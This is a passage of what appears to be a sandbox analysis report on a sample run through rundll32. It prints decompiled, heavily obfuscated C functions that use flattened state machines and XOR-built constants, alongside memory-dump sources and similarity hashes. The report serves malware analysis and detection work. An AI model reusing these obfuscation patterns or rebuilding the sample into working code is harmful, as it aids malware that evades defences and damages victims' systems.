                                                                                                                                                            				_v12 = _v12 + 0xb337;
                                                                                                                                                            				_v12 = _v12 ^ 0x6c9daebe;
                                                                                                                                                            				do {
                                                                                                                                                            					while(_t125 != 0x2aa38ff) {
                                                                                                                                                            						if(_t125 == 0x81ec960) {
                                                                                                                                                            							_t124 = _t124 + E0038C2F8(_v32, _t116 + 0x38, _v4, _v8, _v12);
                                                                                                                                                            						} else {
                                                                                                                                                            							if(_t125 == 0xa7224d4) {
                                                                                                                                                            								_t118 = _v16;
                                                                                                                                                            								_t111 = E0038C2F8(_t118, _t116 + 0x14, _v36, _v40, _v20);
                                                                                                                                                            								_t127 =  &(_t127[3]);
                                                                                                                                                            								_t125 = 0x81ec960;
                                                                                                                                                            								_t124 = _t124 + _t111;
                                                                                                                                                            								continue;
                                                                                                                                                            							} else {
                                                                                                                                                            								if(_t125 != 0xcb4deb0) {
                                                                                                                                                            									goto L8;
                                                                                                                                                            								} else {
                                                                                                                                                            									_push(_t118);
                                                                                                                                                            									_push(_t118);
                                                                                                                                                            									_t115 = E0037474B();
                                                                                                                                                            									_t127 =  &(_t127[2]);
                                                                                                                                                            									_t125 = 0xa7224d4;
                                                                                                                                                            									_t124 = _t124 + _t115;
                                                                                                                                                            									continue;
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						L11:
                                                                                                                                                            						return _t124;
                                                                                                                                                            					}
                                                                                                                                                            					_t125 = 0xcb4deb0;
                                                                                                                                                            					L8:
                                                                                                                                                            				} while (_t125 != 0x4501b46);
                                                                                                                                                            				goto L11;
                                                                                                                                                            			}






















                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 9^xu$fj$im
                                                                                                                                                            • API String ID: 0-3261451082
                                                                                                                                                            • Opcode ID: 18b3828217514bbcca6388c8ecba237d954a44b53edf24ff878c84fc7e148a74
                                                                                                                                                            • Instruction ID: 956fa564d83334b3a3dae636c7bd71d8797197f934438a187512832dec382891
                                                                                                                                                            • Opcode Fuzzy Hash: 18b3828217514bbcca6388c8ecba237d954a44b53edf24ff878c84fc7e148a74
                                                                                                                                                            • Instruction Fuzzy Hash: 405146B28183429FC788CF25D48540BBBE0BFD8368F511A1DF499A6260D3B4CA49CF97
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                            			E00386C49(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				signed int _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                            				char _v88;
                                                                                                                                                            				char _v608;
                                                                                                                                                            				void* _t92;
                                                                                                                                                            				void* _t96;
                                                                                                                                                            				void* _t101;
                                                                                                                                                            				void* _t112;
                                                                                                                                                            				void* _t113;
                                                                                                                                                            
                                                                                                                                                            				_push(_a12);
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t92);
                                                                                                                                                            				_v52 = _v52 & 0x00000000;
                                                                                                                                                            				_v56 = 0x878462;
                                                                                                                                                            				_t113 = _t112 + 0x14;
                                                                                                                                                            				_v32 = 0x956791;
                                                                                                                                                            				_t101 = 0x1300659;
                                                                                                                                                            				_v32 = _v32 + 0xffff68af;
                                                                                                                                                            				_v32 = _v32 ^ 0x0094d050;
                                                                                                                                                            				_v48 = 0xb6c679;
                                                                                                                                                            				_v48 = _v48 * 9;
                                                                                                                                                            				_v48 = _v48 ^ 0x0662f925;
                                                                                                                                                            				_v16 = 0xd9c762;
                                                                                                                                                            				_v16 = _v16 << 1;
                                                                                                                                                            				_v16 = _v16 | 0xb4c78449;
                                                                                                                                                            				_v16 = _v16 ^ 0xb5f30401;
                                                                                                                                                            				_v40 = 0x8b331e;
                                                                                                                                                            				_v40 = _v40 >> 0xc;
                                                                                                                                                            				_v40 = _v40 ^ 0x000c5129;
                                                                                                                                                            				_v28 = 0x1269f4;
                                                                                                                                                            				_v28 = _v28 >> 4;
                                                                                                                                                            				_v28 = _v28 ^ 0x0007e996;
                                                                                                                                                            				_v44 = 0xabd705;
                                                                                                                                                            				_v44 = _v44 ^ 0x9c90d177;
                                                                                                                                                            				_v44 = _v44 ^ 0x9c3fe788;
                                                                                                                                                            				_v8 = 0x357d72;
                                                                                                                                                            				_v8 = _v8 + 0xd90c;
                                                                                                                                                            				_v8 = _v8 ^ 0xccfdbdcb;
                                                                                                                                                            				_v8 = _v8 >> 3;
                                                                                                                                                            				_v8 = _v8 ^ 0x199e890f;
                                                                                                                                                            				_v12 = 0x32e6;
                                                                                                                                                            				_v12 = _v12 ^ 0x74a35607;
                                                                                                                                                            				_v12 = _v12 | 0x704b9008;
                                                                                                                                                            				_v12 = _v12 + 0xffff83aa;
                                                                                                                                                            				_v12 = _v12 ^ 0x74eee325;
                                                                                                                                                            				_v36 = 0xeddfb6;
                                                                                                                                                            				_v36 = _v36 << 0xa;
                                                                                                                                                            				_v36 = _v36 ^ 0xb77b8cf2;
                                                                                                                                                            				_v24 = 0xe2b758;
                                                                                                                                                            				_v24 = _v24 << 5;
                                                                                                                                                            				_v24 = _v24 * 0x38;
                                                                                                                                                            				_v24 = _v24 ^ 0x330719f5;
                                                                                                                                                            				_v20 = 0x9236d6;
                                                                                                                                                            				_v20 = _v20 | 0x3f0523f5;
                                                                                                                                                            				_v20 = _v20 >> 0xd;
                                                                                                                                                            				_v20 = _v20 ^ 0x000835ca;
                                                                                                                                                            				do {
                                                                                                                                                            					while(_t101 != 0x1300659) {
                                                                                                                                                            						if(_t101 == 0xa264c44) {
                                                                                                                                                            							_t96 = E00379D31(_v40,  &_v608, _v28, _t101, _v44, _v8);
                                                                                                                                                            							_t113 = _t113 + 0x10;
                                                                                                                                                            							_t101 = 0xbcabc0e;
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t101 != 0xbcabc0e) {
                                                                                                                                                            							goto L8;
                                                                                                                                                            						}
                                                                                                                                                            						return E00386637( &_v88, _v12, _v36, _v24,  &_v608, _a12, _v20);
                                                                                                                                                            					}
                                                                                                                                                            					_t96 = E00374B61( &_v88, _v32, _v48, _v16);
                                                                                                                                                            					_t101 = 0xa264c44;
                                                                                                                                                            					L8:
                                                                                                                                                            				} while (_t101 != 0x478adce);
                                                                                                                                                            				return _t96;
                                                                                                                                                            			}
























                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: %t$DL&$r}5
                                                                                                                                                            • API String ID: 0-2337153543
                                                                                                                                                            • Opcode ID: 7dbbebab4da4aa2abdde95fd686c9ed2a692aafdb7a56fb7eb10c47b438e4e0c
                                                                                                                                                            • Instruction ID: 479a0a713fb7e408edc60f1d9d0f903078bb8c4f671bcae23c4e3e75eac81249
                                                                                                                                                            • Opcode Fuzzy Hash: 7dbbebab4da4aa2abdde95fd686c9ed2a692aafdb7a56fb7eb10c47b438e4e0c
                                                                                                                                                            • Instruction Fuzzy Hash: DF411271D0020EEBCF1ADFE1D94A8EEBBB1FB48318F208198D51176260D3B54A59CFA5
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • __decode_pointer.LIBCMT ref: 1003B8CA
                                                                                                                                                              • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350BB
                                                                                                                                                              • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350D2
                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32 ref: 1003B8D1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value$ExceptionFilterUnhandled__decode_pointer
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1958600898-0
                                                                                                                                                            • Opcode ID: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                                                            • Instruction ID: 13914855b6ed5f75d6cf868945e622cc1528c9e1cf50f9ea13f0b817109926cd
                                                                                                                                                            • Opcode Fuzzy Hash: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                                                            • Instruction Fuzzy Hash: 7FC08C388087C04FEB1AD3354D8C30D3E00E713301FC00488DC80D5053EE99410C8323
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                            			E00381889(void* __ecx) {
                                                                                                                                                            				char _v520;
                                                                                                                                                            				char _v1040;
                                                                                                                                                            				char _v1560;
                                                                                                                                                            				short _v1564;
                                                                                                                                                            				intOrPtr _v1568;
                                                                                                                                                            				signed int _v1572;
                                                                                                                                                            				signed int _v1576;
                                                                                                                                                            				signed int _v1580;
                                                                                                                                                            				signed int _v1584;
                                                                                                                                                            				signed int _v1588;
                                                                                                                                                            				signed int _v1592;
                                                                                                                                                            				signed int _v1596;
                                                                                                                                                            				signed int _v1600;
                                                                                                                                                            				signed int _v1604;
                                                                                                                                                            				signed int _v1608;
                                                                                                                                                            				signed int _v1612;
                                                                                                                                                            				signed int _v1616;
                                                                                                                                                            				signed int _v1620;
                                                                                                                                                            				signed int _v1624;
                                                                                                                                                            				signed int _v1628;
                                                                                                                                                            				signed int _v1632;
                                                                                                                                                            				signed int _v1636;
                                                                                                                                                            				signed int _v1640;
                                                                                                                                                            				signed int _v1644;
                                                                                                                                                            				signed int _v1648;
                                                                                                                                                            				signed int _v1652;
                                                                                                                                                            				signed int _v1656;
                                                                                                                                                            				signed int _v1660;
                                                                                                                                                            				signed int _v1664;
                                                                                                                                                            				signed int _v1668;
                                                                                                                                                            				signed int _v1672;
                                                                                                                                                            				signed int _v1676;
                                                                                                                                                            				signed int _v1680;
                                                                                                                                                            				signed int _t323;
                                                                                                                                                            				signed int _t334;
                                                                                                                                                            				signed int _t337;
                                                                                                                                                            				signed int _t338;
                                                                                                                                                            				signed int _t339;
                                                                                                                                                            				signed int _t340;
                                                                                                                                                            				signed int _t341;
                                                                                                                                                            				signed int _t342;
                                                                                                                                                            				signed int _t343;
                                                                                                                                                            				signed int _t344;
                                                                                                                                                            				signed int _t345;
                                                                                                                                                            				signed int _t346;
                                                                                                                                                            				void* _t386;
                                                                                                                                                            				void* _t387;
                                                                                                                                                            				signed int* _t390;
                                                                                                                                                            
                                                                                                                                                            				_t390 =  &_v1680;
                                                                                                                                                            				_v1568 = 0xdfec4c;
                                                                                                                                                            				_t386 = __ecx;
                                                                                                                                                            				_v1564 = 0;
                                                                                                                                                            				_t387 = 0xea1969c;
                                                                                                                                                            				_v1596 = 0xb94d4f;
                                                                                                                                                            				_v1596 = _v1596 >> 2;
                                                                                                                                                            				_v1596 = _v1596 ^ 0x002b88ba;
                                                                                                                                                            				_v1604 = 0x7820e8;
                                                                                                                                                            				_t9 =  &_v1604; // 0x7820e8
                                                                                                                                                            				_t337 = 0x3f;
                                                                                                                                                            				_v1604 =  *_t9 / _t337;
                                                                                                                                                            				_v1604 = _v1604 << 6;
                                                                                                                                                            				_v1604 = _v1604 ^ 0x0075b154;
                                                                                                                                                            				_v1676 = 0xd796f6;
                                                                                                                                                            				_v1676 = _v1676 << 7;
                                                                                                                                                            				_t338 = 0x1f;
                                                                                                                                                            				_v1676 = _v1676 / _t338;
                                                                                                                                                            				_v1676 = _v1676 | 0x34dfec15;
                                                                                                                                                            				_v1676 = _v1676 ^ 0x37fcd475;
                                                                                                                                                            				_v1580 = 0x701ced;
                                                                                                                                                            				_t339 = 0x3b;
                                                                                                                                                            				_v1580 = _v1580 / _t339;
                                                                                                                                                            				_v1580 = _v1580 ^ 0x000eda5b;
                                                                                                                                                            				_v1584 = 0x3864f;
                                                                                                                                                            				_v1584 = _v1584 | 0xebab6106;
                                                                                                                                                            				_v1584 = _v1584 ^ 0xeba3c8dc;
                                                                                                                                                            				_v1668 = 0x7d6229;
                                                                                                                                                            				_v1668 = _v1668 + 0x90f9;
                                                                                                                                                            				_t340 = 0x7d;
                                                                                                                                                            				_v1668 = _v1668 * 0xd;
                                                                                                                                                            				_v1668 = _v1668 + 0x17d6;
                                                                                                                                                            				_v1668 = _v1668 ^ 0x06671cb6;
                                                                                                                                                            				_v1652 = 0x8dafad;
                                                                                                                                                            				_v1652 = _v1652 + 0xffffa237;
                                                                                                                                                            				_v1652 = _v1652 / _t340;
                                                                                                                                                            				_v1652 = _v1652 ^ 0xeab94c45;
                                                                                                                                                            				_v1652 = _v1652 ^ 0xeabb4144;
                                                                                                                                                            				_v1620 = 0x364acf;
                                                                                                                                                            				_v1620 = _v1620 + 0xffffd559;
                                                                                                                                                            				_v1620 = _v1620 ^ 0x476b0832;
                                                                                                                                                            				_v1620 = _v1620 ^ 0x4757dcec;
                                                                                                                                                            				_v1660 = 0xdffac8;
                                                                                                                                                            				_v1660 = _v1660 | 0xd3f81aab;
                                                                                                                                                            				_t341 = 0xd;
                                                                                                                                                            				_v1660 = _v1660 / _t341;
                                                                                                                                                            				_v1660 = _v1660 + 0x2ca8;
                                                                                                                                                            				_v1660 = _v1660 ^ 0x10473906;
                                                                                                                                                            				_v1636 = 0xafa95;
                                                                                                                                                            				_v1636 = _v1636 | 0x12b9adda;
                                                                                                                                                            				_v1636 = _v1636 + 0xca30;
                                                                                                                                                            				_t342 = 0x24;
                                                                                                                                                            				_v1636 = _v1636 / _t342;
                                                                                                                                                            				_v1636 = _v1636 ^ 0x008bc8e6;
                                                                                                                                                            				_v1612 = 0xa1b06d;
                                                                                                                                                            				_v1612 = _v1612 ^ 0xd927b519;
                                                                                                                                                            				_t334 = 0x1c;
                                                                                                                                                            				_v1612 = _v1612 / _t334;
                                                                                                                                                            				_v1612 = _v1612 ^ 0x07c55aff;
                                                                                                                                                            				_v1628 = 0xe475d7;
                                                                                                                                                            				_v1628 = _v1628 + 0xf351;
                                                                                                                                                            				_v1628 = _v1628 >> 9;
                                                                                                                                                            				_v1628 = _v1628 ^ 0x000b149a;
                                                                                                                                                            				_v1644 = 0xc98f78;
                                                                                                                                                            				_v1644 = _v1644 + 0xa497;
                                                                                                                                                            				_v1644 = _v1644 + 0xab0a;
                                                                                                                                                            				_v1644 = _v1644 ^ 0x9916dffd;
                                                                                                                                                            				_v1644 = _v1644 ^ 0x99d32d23;
                                                                                                                                                            				_v1572 = 0xdb2c8b;
                                                                                                                                                            				_v1572 = _v1572 ^ 0xa2354bd4;
                                                                                                                                                            				_v1572 = _v1572 ^ 0xa2e9b3f6;
                                                                                                                                                            				_v1616 = 0x8ac290;
                                                                                                                                                            				_v1616 = _v1616 | 0xd6340cba;
                                                                                                                                                            				_t343 = 0x17;
                                                                                                                                                            				_v1616 = _v1616 / _t343;
                                                                                                                                                            				_v1616 = _v1616 ^ 0x095403ec;
                                                                                                                                                            				_v1624 = 0xc9b33;
                                                                                                                                                            				_v1624 = _v1624 | 0xadec2c36;
                                                                                                                                                            				_t344 = 0x23;
                                                                                                                                                            				_v1624 = _v1624 / _t344;
                                                                                                                                                            				_v1624 = _v1624 ^ 0x04f29945;
                                                                                                                                                            				_v1672 = 0xce6284;
                                                                                                                                                            				_t345 = 0x1b;
                                                                                                                                                            				_v1672 = _v1672 * 0x47;
                                                                                                                                                            				_v1672 = _v1672 >> 0xb;
                                                                                                                                                            				_v1672 = _v1672 | 0xab5418c0;
                                                                                                                                                            				_v1672 = _v1672 ^ 0xab589207;
                                                                                                                                                            				_v1680 = 0xfb4294;
                                                                                                                                                            				_v1680 = _v1680 * 0x56;
                                                                                                                                                            				_v1680 = _v1680 >> 0xe;
                                                                                                                                                            				_v1680 = _v1680 >> 4;
                                                                                                                                                            				_v1680 = _v1680 ^ 0x000a896c;
                                                                                                                                                            				_v1576 = 0xa0fe48;
                                                                                                                                                            				_v1576 = _v1576 / _t345;
                                                                                                                                                            				_v1576 = _v1576 ^ 0x000b8e8e;
                                                                                                                                                            				_v1608 = 0x915f33;
                                                                                                                                                            				_v1608 = _v1608 + 0xfa43;
                                                                                                                                                            				_v1608 = _v1608 >> 0xc;
                                                                                                                                                            				_v1608 = _v1608 ^ 0x000a30cc;
                                                                                                                                                            				_v1648 = 0x21b71b;
                                                                                                                                                            				_v1648 = _v1648 ^ 0x78ef874e;
                                                                                                                                                            				_v1648 = _v1648 | 0x9c246086;
                                                                                                                                                            				_v1648 = _v1648 * 0x4a;
                                                                                                                                                            				_v1648 = _v1648 ^ 0x1ce73be6;
                                                                                                                                                            				_v1592 = 0x926794;
                                                                                                                                                            				_v1592 = _v1592 + 0xffff6f6e;
                                                                                                                                                            				_v1592 = _v1592 ^ 0x009c0ed2;
                                                                                                                                                            				_v1656 = 0x919083;
                                                                                                                                                            				_v1656 = _v1656 / _t334;
                                                                                                                                                            				_v1656 = _v1656 >> 2;
                                                                                                                                                            				_t346 = 0x67;
                                                                                                                                                            				_v1656 = _v1656 / _t346;
                                                                                                                                                            				_v1656 = _v1656 ^ 0x0003c4fa;
                                                                                                                                                            				_v1664 = 0xb12839;
                                                                                                                                                            				_v1664 = _v1664 ^ 0xbcb8295e;
                                                                                                                                                            				_v1664 = _v1664 + 0xe70b;
                                                                                                                                                            				_v1664 = _v1664 + 0xffffbcc9;
                                                                                                                                                            				_v1664 = _v1664 ^ 0xbc0a928f;
                                                                                                                                                            				_v1600 = 0x37ff42;
                                                                                                                                                            				_v1600 = _v1600 + 0xffff03fd;
                                                                                                                                                            				_v1600 = _v1600 >> 3;
                                                                                                                                                            				_v1600 = _v1600 ^ 0x000f4750;
                                                                                                                                                            				_v1632 = 0xbb4856;
                                                                                                                                                            				_v1632 = _v1632 * 0x4e;
                                                                                                                                                            				_v1632 = _v1632 | 0xf74fdfff;
                                                                                                                                                            				_v1632 = _v1632 ^ 0xff54b7ec;
                                                                                                                                                            				_v1640 = 0x73c8d7;
                                                                                                                                                            				_v1640 = _v1640 * 0x56;
                                                                                                                                                            				_v1640 = _v1640 << 0xb;
                                                                                                                                                            				_v1640 = _v1640 >> 7;
                                                                                                                                                            				_v1640 = _v1640 ^ 0x005dc3ee;
                                                                                                                                                            				_v1588 = 0xe2f656;
                                                                                                                                                            				_t323 = _v1588 * 0x57;
                                                                                                                                                            				_v1588 = _t323;
                                                                                                                                                            				_v1588 = _v1588 ^ 0x4d200bca;
                                                                                                                                                            				while(_t387 != 0x5de06da) {
                                                                                                                                                            					if(_t387 == 0xea1969c) {
                                                                                                                                                            						_t387 = 0xfa9128f;
                                                                                                                                                            						continue;
                                                                                                                                                            					} else {
                                                                                                                                                            						_t395 = _t387 - 0xfa9128f;
                                                                                                                                                            						if(_t387 != 0xfa9128f) {
                                                                                                                                                            							L8:
                                                                                                                                                            							__eflags = _t387 - 0xa8e801c;
                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                            								continue;
                                                                                                                                                            							}
                                                                                                                                                            						} else {
                                                                                                                                                            							E0038DA22(_v1596, _v1604, _t395, _v1676,  &_v1040, _t346, _v1580);
                                                                                                                                                            							 *((short*)(E0037B6CF( &_v1040, _v1584, _v1668, _v1652))) = 0;
                                                                                                                                                            							E00378969(_v1620,  &_v520, _t395, _v1660, _v1636);
                                                                                                                                                            							_push(_v1644);
                                                                                                                                                            							_push(_v1628);
                                                                                                                                                            							E003747CE( &_v1040, _v1572, _v1612, _v1616, _v1624, E0038DCF7(_v1612, 0x371328, _t395),  &_v520, _v1672, _v1680);
                                                                                                                                                            							E0037A8B0(_v1576, _t329, _v1608);
                                                                                                                                                            							_t346 = _v1648;
                                                                                                                                                            							_t323 = E0037EA99(_t346, _t386, _v1592, _v1656,  &_v1560, _v1664);
                                                                                                                                                            							_t390 =  &(_t390[0x17]);
                                                                                                                                                            							if(_t323 != 0) {
                                                                                                                                                            								_t387 = 0x5de06da;
                                                                                                                                                            								continue;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					return _t323;
                                                                                                                                                            				}
                                                                                                                                                            				_push(_v1588);
                                                                                                                                                            				_push( &_v1560);
                                                                                                                                                            				_push(_t346);
                                                                                                                                                            				_push(0);
                                                                                                                                                            				_push(0);
                                                                                                                                                            				_push(_v1640);
                                                                                                                                                            				_t346 = _v1600;
                                                                                                                                                            				_push(0);
                                                                                                                                                            				_t323 = E0037AB87(_t346, _v1632, __eflags);
                                                                                                                                                            				_t390 =  &(_t390[7]);
                                                                                                                                                            				_t387 = 0xa8e801c;
                                                                                                                                                            				goto L8;
                                                                                                                                                            			}




















































                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: )b}$ x
                                                                                                                                                            • API String ID: 0-2724122486
                                                                                                                                                            • Opcode ID: 26bceec668d88352eba14e74d9cf026d227a78793e337ab1cb341a16ad60e48a
                                                                                                                                                            • Instruction ID: 2cfa06008980637177943880aaee6127f5a0c16f072ed00a607fe7f501fa3f8c
                                                                                                                                                            • Opcode Fuzzy Hash: 26bceec668d88352eba14e74d9cf026d227a78793e337ab1cb341a16ad60e48a
                                                                                                                                                            • Instruction Fuzzy Hash: C2D120715083819FE368CF60C48A95BFBF2FBD5358F108A1DF2999A260D7B58949CF42
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 99%
                                                                                                                                                            			E0038473C() {
                                                                                                                                                            				intOrPtr _v4;
                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				signed int _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				signed int _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				signed int _v72;
                                                                                                                                                            				signed int _v76;
                                                                                                                                                            				signed int _v80;
                                                                                                                                                            				signed int _v84;
                                                                                                                                                            				signed int _v88;
                                                                                                                                                            				signed int _v92;
                                                                                                                                                            				signed int _v96;
                                                                                                                                                            				signed int _v100;
                                                                                                                                                            				void* _t218;
                                                                                                                                                            				signed int _t219;
                                                                                                                                                            				void* _t225;
                                                                                                                                                            				void* _t246;
                                                                                                                                                            				intOrPtr _t251;
                                                                                                                                                            				signed int _t252;
                                                                                                                                                            				signed int _t253;
                                                                                                                                                            				signed int _t254;
                                                                                                                                                            				signed int _t255;
                                                                                                                                                            				signed int _t256;
                                                                                                                                                            				signed int _t257;
                                                                                                                                                            				intOrPtr _t258;
                                                                                                                                                            				intOrPtr* _t259;
                                                                                                                                                            				signed int _t260;
                                                                                                                                                            				signed int* _t261;
                                                                                                                                                            
                                                                                                                                                            				_t261 =  &_v100;
                                                                                                                                                            				_v12 = 0xf244e3;
                                                                                                                                                            				_v8 = 0x291d6d;
                                                                                                                                                            				_t225 = 0x37f2dd7;
                                                                                                                                                            				_t251 = 0;
                                                                                                                                                            				_v4 = 0;
                                                                                                                                                            				_v68 = 0x555e8d;
                                                                                                                                                            				_v68 = _v68 + 0xfffff532;
                                                                                                                                                            				_v68 = _v68 | 0x235b50f0;
                                                                                                                                                            				_v68 = _v68 ^ 0x235e53ff;
                                                                                                                                                            				_v84 = 0xf72ec;
                                                                                                                                                            				_v84 = _v84 >> 7;
                                                                                                                                                            				_t252 = 0x19;
                                                                                                                                                            				_v84 = _v84 / _t252;
                                                                                                                                                            				_v84 = _v84 << 3;
                                                                                                                                                            				_v84 = _v84 ^ 0x000f09df;
                                                                                                                                                            				_v20 = 0xee8389;
                                                                                                                                                            				_t253 = 0x51;
                                                                                                                                                            				_v20 = _v20 * 0x29;
                                                                                                                                                            				_v20 = _v20 ^ 0x2635dc09;
                                                                                                                                                            				_v88 = 0xea545e;
                                                                                                                                                            				_t30 =  &_v88; // 0xea545e
                                                                                                                                                            				_v88 =  *_t30 / _t253;
                                                                                                                                                            				_t36 =  &_v88; // 0xea545e
                                                                                                                                                            				_t254 = 0x7a;
                                                                                                                                                            				_v88 =  *_t36 * 0x1c;
                                                                                                                                                            				_v88 = _v88 + 0xc9a8;
                                                                                                                                                            				_v88 = _v88 ^ 0x005db592;
                                                                                                                                                            				_v24 = 0x448750;
                                                                                                                                                            				_v24 = _v24 / _t254;
                                                                                                                                                            				_v24 = _v24 ^ 0x000cab3c;
                                                                                                                                                            				_v28 = 0x8cea36;
                                                                                                                                                            				_v28 = _v28 * 0x38;
                                                                                                                                                            				_v28 = _v28 ^ 0x1eda9ad9;
                                                                                                                                                            				_v100 = 0x8110ba;
                                                                                                                                                            				_v100 = _v100 + 0x3ab9;
                                                                                                                                                            				_v100 = _v100 ^ 0x336ca884;
                                                                                                                                                            				_v100 = _v100 + 0xffff8c66;
                                                                                                                                                            				_v100 = _v100 ^ 0x33e0711c;
                                                                                                                                                            				_v64 = 0x5ca85e;
                                                                                                                                                            				_v64 = _v64 >> 0x10;
                                                                                                                                                            				_v64 = _v64 * 0x4e;
                                                                                                                                                            				_v64 = _v64 ^ 0x000b11ab;
                                                                                                                                                            				_v44 = 0x2bb2b6;
                                                                                                                                                            				_v44 = _v44 | 0xbbfbcd5f;
                                                                                                                                                            				_v44 = _v44 ^ 0xbbf16182;
                                                                                                                                                            				_v72 = 0x855f4c;
                                                                                                                                                            				_v72 = _v72 ^ 0x87656771;
                                                                                                                                                            				_v72 = _v72 * 0x71;
                                                                                                                                                            				_v72 = _v72 ^ 0xf9f8e59a;
                                                                                                                                                            				_v96 = 0x938339;
                                                                                                                                                            				_v96 = _v96 << 8;
                                                                                                                                                            				_v96 = _v96 << 0xf;
                                                                                                                                                            				_v96 = _v96 ^ 0xcc040e17;
                                                                                                                                                            				_v96 = _v96 ^ 0x50841052;
                                                                                                                                                            				_v40 = 0xbe1d32;
                                                                                                                                                            				_v40 = _v40 + 0x9b9c;
                                                                                                                                                            				_v40 = _v40 ^ 0x00bc2d0e;
                                                                                                                                                            				_v56 = 0x9e5686;
                                                                                                                                                            				_v56 = _v56 + 0xffffd134;
                                                                                                                                                            				_v56 = _v56 + 0xffff1440;
                                                                                                                                                            				_v56 = _v56 ^ 0x0091c9b6;
                                                                                                                                                            				_v60 = 0xb7e614;
                                                                                                                                                            				_v60 = _v60 << 3;
                                                                                                                                                            				_v60 = _v60 >> 8;
                                                                                                                                                            				_v60 = _v60 ^ 0x00065aea;
